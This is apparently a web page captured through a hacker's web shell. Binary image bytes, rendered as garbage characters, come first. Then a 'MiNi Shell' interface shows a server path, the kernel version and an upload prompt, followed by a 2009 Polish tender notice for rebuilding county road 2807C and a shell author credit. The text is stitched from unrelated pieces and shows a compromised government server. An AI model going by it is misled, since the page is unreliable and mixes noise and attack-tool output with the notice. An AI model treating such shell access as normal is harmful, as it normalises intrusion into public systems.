JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090305/46257-N-2009.html

<p class="kh_header"><b>Choceń: Przebudowa drogi powiatowej nr 2807C Osięciny - Wieniec - Włocławek od km 15+737 do km 21+975</b><br>
<b>Numer ogłoszenia: 46257 - 2009; data zamieszczenia: 05.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg we Włocławku , Jarantowice 5, 87-850 Choceń, woj. kujawsko-pomorskie, tel. 054 2846487, faks 054 2846487.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiat.wloclawski.pl/?cid=1311</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi powiatowej nr 2807C Osięciny - Wieniec - Włocławek od km 15+737 do km 21+975.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa drogi powiatowej nr 2807C Osięciny - Wieniec - Włocławek od km 15+737 do km 21+975
3.1.Zakres robót obejmuje:
-	roboty pomiarowe,
-	roboty przygotowawcze,
-	roboty ziemne - plantowanie,
-	przepusty,
-	nawierzchnie,
-	zjazdy,
3.1.1.Projektowana konstrukcja jezdni:
a). Na poszerzeniach:
-	 warstwa ścieralna z betonu asfaltowego  - 4 cm
-	 warstwa wyrównawcza z betonu asfaltowego  - 7 cm
-	 górna warstwa podbudowy z kruszywa łamanego - 8 cm
-	 dolna warstwa podbudowy z kruszywa łamanego - 12 cm
-	 grunt stabilizowany cementem - 15 cm
b). Na istniejącej nawierzchni:
-	warstwa ścieralna z betonu asfaltowego  - 4 cm
-	warstwa wyrównawcza z betonu asfaltowego  - 7 cm
3.1.2. Pobocza gruntowe poza obszarem zabudowanym o szer. 1,0 ÷ 2,0 m.
3.1.3. Ścieżka pieszo - rowerowa szerokości  2,5 ÷ 3,0 m.
3.1.4. Zatoki autobusowe z kostki brukowej betonowej.
3.1.5. Zjazdy indywidualne o nawierzchni z kostki brukowej betonowej. 

Przebudowę drogi powiatowej nr 2807C Osięciny - Wieniec - Włocławek od km 15+737 do km 21+975 należy wykonać zgodnie z dokumentacją projektową, specyfikacją techniczną, obowiązującymi przepisami oraz sztuką budowlaną..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wymagania dotyczące wadium.
1.1.Zamawiający wymaga składania wadium w kwocie 60 000 zł słownie: sześćdziesiąt tysięcy złotych, 
Termin ważności wadium określa się na  30 dni. Termin liczony jest od terminu składania ofert.
Wadium może być wnoszone w jednej lub kilku następujących formach: 
  1)  pieniądzu przelewem na konto Zamawiającego KDBS O/Włocławek 79 9550 0003 2001 0075 4192 0003,
  2)  gwarancjach bankowych, 
  3)  gwarancjach ubezpieczeniowych.
  
Nie wniesienie wadium lub wniesienie wadium po terminie składania ofert spowoduje wykluczenie wykonawcy z postępowania.

1.2. Wadium należy wnieść przed upływem terminu składania ofert.
- w przypadku przelewu na rachunek zamawiającego, dowód wniesienia wadium należy załączyć do oferty.
- w przypadku wniesienia wadium w pozostałych formach należy dokument  załączyć do oferty.

1.3. Zamawiający dokona zwrotu wadium niezwłocznie po:
- upływie terminu związania ofertą,
- zawarciu umowy z wykonawcą i wniesieniu wymaganego zabezpieczenia należytego wykonania umowy,
- unieważnienia postępowania o udzielenie zamówienia , a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.

1.4. Zamawiający dokona niezwłocznie zwrotu wadium na wniosek Wykonawcy:
- który wycofał ofertę przed upływem terminu do składania ofert,
- który został wykluczony z postępowania lub którego oferta została odrzucona.

1.5. Wykonawca, którego oferta zostanie wybrana traci wadium wraz z odsetkami na rzecz Zamawiającego jeżeli:
- odmówi podpisania umowy na warunkach określonych w ofercie,
- odmówi wniesienia zabezpieczenia należytego wykonania umowy, na zasadach określonych w Specyfikacji Istotnych Warunków Zamówienia,
- zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.
- Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki ogólne
7.1.W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24 ust. 1 i ust. 2  ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych (tekst jednolity Dz. U. z 2007r. Nr 223, poz. 1655 z późniejszymi zmianami), spełniający warunki i wymagania określone w Specyfikacji Istotnych Warunków Zamówienia oraz w art. 22 ust. 1 pkt 1-4 ustawy Prawo Zamówień Publicznych.
7.2.Wykonawcy biorący udział w postępowaniu muszą spełnić warunki i potwierdzić ich spełnienie oświadczeniami lub dokumentami wymaganymi w punkcie 7.3, 7.4, 7.5. 
7.3. Potwierdzenie, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podst. art. 24 ustawy P.z.p:
7.4. Potwierdzenie, że wykonawca spełnia warunki posiadania niezbędnej wiedzy i doświadczenia oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia:
1. Wykaz wykonanych robót budowlanych-drogowych /zakończonych/ w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności gospodarczej jest krótszy - w tym okresie. Należy podać wartość, datę i miejsce wykonania oraz załączyć krótki opis elementów robót. Do wykazu załączyć dokument potwierdzający, że wskazane roboty zostały wykonane należycie zał. do SIWZ nr 2
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie 
2. Wykaz osób przewidzianych do realizacji zamówienia, którymi dysponuje lub będzie dysponował wykonawca:dotyczy kierownika budowy i kierownika robót- Kserokopia uprawnień budowlanych - Kserokopia aktualnego zaświadczenia potwierdzającego członkostwo w PIIB wraz z dokumentem potwierdzającym ważne ubezpieczenie OC.- sporządzić wykaz robót na których pełnił funkcję kierownika budowy - dotyczy kierownika budowy- sporządzić wykaz robót na których pełnił funkcję kierownika robót - dotyczy kierownika robót- Kserokopia uprawnień - dotyczy obsługi geodezyjnej.- Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, w przypadku jeżeli w wykazie wykonawca wskazał osoby, którymi będzie dysponował.
Kierownik budowy - 1 osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej, która jest aktualnie członkiem PIIB i posiada ubezpieczenie OC jako członek Izby oraz posiadający, co najmniej roczne doświadczenie w wykonywaniu robót drogowych na stanowisku kierownik budowy. Kierownik robót - 1 osoba posiadająca uprawnienia budowlane  do kierowania robotami budowlanymi w specjalności drogowej, która jest aktualnie członkiem  PIIB i posiada ubezpieczenie OC jako członek Izby oraz posiadający co najmniej roczne doświadczenie w wykonywaniu robót drogowych na stanowisku kierownik robót.Geodeta posiadający uprawnienia - geodezyjne pomiary sytuacyjno-wysokościowe
3. W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia  warunek w pkt 2 mogą spełniać łącznie
Wykaz części zamówienia których wykonanie wykonawca powierzy podwykonawcom 
-nie określa się warunków 
4. Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń jakimi dysponuje lub będzie dysponował wykonawca:- Sporządzić wykaz jednostek sprzętowych wraz z opisem parametrów technicznych potwierdzających spełnienie wymagań zamawiającego /typ, ilość, forma własności/- Pisemne zobowiązanie podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń, w przypadku jeżeli w wykazie wykonawca wskazał, że będzie dysponował  narzędziami i urządzeniami.	
O zamówienie mogą ubiegać się wykonawcy dysponujący lub posiadający pisemne zobowiązanie do dysponowania następującymi  jednostkami sprzętowymi:- Wytwórnia mieszanek mineralno-asfaltowych wyposażona w jedną otaczarkę o mieszaniu cyklicznym lub ciągłym z możliwością podgrzewania kruszywa. Otaczarka musi być wyposażona w automatyczny dozownik stabilizatora. Wydajność otaczarki nie mniejsza niż 150 Mg/h. - 1 szt,Lokalizacja wytwórni musi zapewnić spełnienie wymagań technologicznych tj. dowóz mieszanki mineralno - bitumicznej w ciągu 2 godzin od załadunku do momentu wbudowania,- Układarka mas bitumicznych- 1 szt.- Skrapiarka lepiszcza wyposażona w urządzenie pomiarowe oraz mechanizmy regulacyjne, które zapewniają równomierne rozłożenie lepiszcza w kierunku podłużnym i poprzecznym - 1 szt- Dwa walce stalowe statyczne samojezdne, jeden walec wibracyjny lub ciężki, jeden walec ogumiony.- Samochody ciężarowe    samowyładowcze - 4 szt- Laboratorium wyposażone, w co najmniej kolumnę ekstrakcyjną, aparat Proctora oraz formę z ubijakiem Marshala i sondę do badania wskaźnika zagęszczenia robót ziemnych i podłoża
W przypadku składania oferty przez wykonawców ubiegających się wspólnie  o udzielenie zamówienia w/w warunek mogą spełniać łącznie.
7.5. Potwierdzenie, że wykonawca spełnia warunki znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
1. Informacja z Banku lub Spółdzielczej Kasy Oszczędnościowo Kredytowej, w którym wykonawca posiada rachunek, potwierdzająca, że wysokość posiadanych środków finansowych lub zdolność kredytowa wykonawcy jest nie mniejsza niż 3,0 mln PLN. Informacja musi być wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.	
Dysponowanie własnymi środkami finansowymi (dopuszczalne jest wykazanie środków kredytu)  w wysokości nie mniejszej niż 3,0 mln  PLN.
2. Polisa lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności objętej niniejszym zamówieniem na termin składania ofert.	Ubezpieczenie od odpowiedzialności cywilnej w związku ze zdarzeniami losowymi, a w szczególności od odpowiedzialności cywilnej za szkody powstałe w czasie realizacji robót objętych umową oraz od następstw nieszczęśliwych wypadków powstałych w związku z prowadzonymi robotami, w tym także ruchem pojazdów mechanicznych dotyczących pracowników i osób trzecich. (minimalna kwota ubezpieczenia 1.000.000,00 zł.). 
W przypadku składania oferty przez wykonawców ubiegających się wspólnie  o udzielenie zamówienia w/w warunek w pkt. 2 musi spełniać każdy z wykonawców , natomiast warunek określony w pkt. 1 mogą spełniać łącznie.
7.6. Nie spełnienie któregokolwiek ze wskazanych wyżej warunków skutkować będzie odrzuceniem oferty. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wg formuły spełnia/nie spełnia .

7.7. Do oferty wspólnej winien być dołączony dokument wskazujący pełnomocnika do reprezentowania Wykonawcy w postępowaniu. Oferta winna być podpisana przez każdego partnera lub  ustanowionego pełnomocnika. Ustanowiony pełnomocnik winien być upoważniony do zaciągania zobowiązań i płatności w imieniu każdego z partnerów oraz wyłącznego występowania w realizacji umowy. 

7.8. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej , zamiast dokumentów, o których mowa w tabeli 7.3 lp. 2,3,4,6 składa odpowiedni dokument lub dokumenty, wystawione w kraju w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
c) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności  lub wstrzymanych w całości wykonywania decyzji właściwego organu.

7.9. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w tabeli 7.3.lp. 5 składa zaświadczenie właściwego organu sadowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust 1 pkt 4-8 ustawy Pzp.

7.10. Dokumenty o których mowa w pkcie 7.8 a) i b)  oraz w pkcie 7.9 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument o którym mowa w pkcie 7.8. c) powinien  być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

7.11. Jeżeli w kraju pochodzenia osoby lub kraju  w którym Wykonawca ma siedzibę  lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkcie 7.8 i 7.9, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Terminy stosuje się odpowiednio..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust ust 1, ust 2 P.z.p. i spełnia wymagania art. 22 ust 1 pkt 1-4 
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert/ oryginał lub kserokopia/	Prowadzenie działalności gospodarczej
3. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (oryginał lub kserokopia).	
Wykonawca nie zalega z opłacaniem podatków, 
4. Aktualne zaświadczenie właściwego oddziału ZUS lub KRUS wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert /oryginał lub kserokopia/	Wykonawca nie zalega z opłacaniem opłat i składek na ubezpieczenie zdrowotne lub społeczne 
5. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust 1 pkt od 4 do 8 Ustawy Prawo Zamówień Publicznych wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.	Nie figuruje w kartotece karnej rejestru karnego w zakresie określonym w art. 24 ust. 1 pkt 4 do 8 ustawy P.z.p.
6. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust 1 pkt 9 Ustawy Prawo Zamówień Publicznych wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.	Nie figuruje w kartotece podmiotów zbiorowych krajowego rejestru karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Pzp.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia w/w warunek musi spełniać każdy z wykonawców.
7.12 Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę .
7.13.  Pozostałe dokumenty  i oświadczenia jakie mają dostarczyć Wykonawcy wraz z ofertą.
7.13.1. Wypełniony formularz ofertowy.
7.13.2. Wypełnione formularz kosztorysu  ofertowego.   
7.13.3. Oświadczenie o udzieleniu gwarancji zał. nr 6.
7.13.4. Dowód wniesienia wadium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.wloclawski.pl/?cid=1311.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg we Włocławku z/s w Jarantowicach, 87-850 Choceń.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2009 godzina 12:00, miejsce: Powiatowy Zarząd Dróg we Włocławku z/s w Jarantowicach, 87-850 Choceń.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com